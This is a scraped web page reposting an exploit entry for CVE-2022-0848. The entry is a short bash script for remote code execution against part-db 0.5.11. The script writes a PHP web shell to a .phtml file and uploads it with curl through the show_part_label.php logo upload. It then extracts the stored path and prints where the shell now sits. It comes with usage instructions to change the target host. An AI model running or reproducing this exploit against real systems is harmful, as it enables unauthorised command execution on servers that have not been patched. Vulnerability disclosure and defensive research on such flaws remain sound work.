[webapps] part-db 0.5.11 - Remote Code Execution (RCE)

2 years ago 157
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE) # Google Dork: NA # Date: 03/04/2022 # Exploit Author: Sunny Mehra @DSKMehra # Vendor Homepage: https://github.com/part-db/part-db # Software Link: https://github.com/part-db/part-db # Version: [ 0.5.11.] # Tested on: [KALI OS] # CVE : CVE-2022-0848 # --------------- #!/bin/bash host=127.0.0.1/Part-DB-0.5.10 #WEBHOST #Usage: Change host #Command: bash exploit.sh #EXPLOIT BY @DSKMehra echo "<?php system(id); ?>">POC.phtml #PHP Shell Code result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'` rm POC.phtml echo Shell Location : "$host/data/media/labels/$result"
Read Entire Article